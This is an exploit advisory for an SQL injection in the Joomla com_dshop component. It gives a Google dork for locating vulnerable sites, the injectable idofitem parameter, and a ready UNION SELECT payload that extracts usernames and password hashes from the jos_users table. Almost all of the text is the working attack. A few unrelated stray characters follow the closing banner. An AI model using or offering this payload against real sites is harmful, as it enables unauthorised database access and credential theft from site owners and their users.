################################################################################################ #Exploit Title: Joomla Component (com_dshop) SQL Injection Vulnerability # #Author : CoBRa_21 # #E-Mail : uyku_cu [at] windowslive.com # #Google Dork : inurl:com_dshop # #Status : High-Risk # #Script Page : null # #Reference : https://www.securityfocus.com/bid/47971/info ################################################################################################ # #SQL Vulnerability # #http://127.0.0.1/[PATH]/index.php?option=com_dshop&controller=fpage&task=flypage&idofitem=12 (SQL) # #SQL Exploit # #+union+select+0,1,2,group_concat(username,0x3a,password),4,5,6,7+from+jos_users # ################################################################################################ # ( Vulnerability Researcher ) ################################################################################################
体验盒子
